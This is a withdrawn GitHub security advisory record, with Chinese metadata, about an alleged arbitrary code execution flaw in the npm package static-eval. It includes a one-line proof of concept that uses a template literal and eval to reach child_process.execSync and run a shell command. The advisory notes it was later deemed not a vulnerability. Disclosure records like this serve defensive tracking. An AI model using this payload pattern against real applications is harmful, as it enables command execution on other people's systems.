OSV 1.4.0 · github-reviewed · 修改于 2021-05-07 00:12
发布时间
2021-05-07 00:11
GitHub 审查时间
2021-03-19 07:01
NVD 发布时间
2021-02-11 20:15
源文件
advisories/github-reviewed/2021/05/GHSA-8v27-2fg9-7h62/GHSA-8v27-2fg9-7h62.json
该公告已于 2021-05-05 04:26 撤回
内容仅用于保留外部引用,请不要将其当作仍然有效的安全结论。
All versions of package static-eval are vulnerable to Arbitrary Code Execution using FunctionExpressions and TemplateLiterals. PoC: var evaluate = require('static-eval'); var parse = require('esprima').parse; var src="(function (x) { return ${eval("console.log(global.process.mainModule.constructor._load('child_process').execSync('ls').toString())")} })()" var ast = parse(src).body[0].expression; evaluate(ast)
This was deemed not a vulnerability. See this issue for details.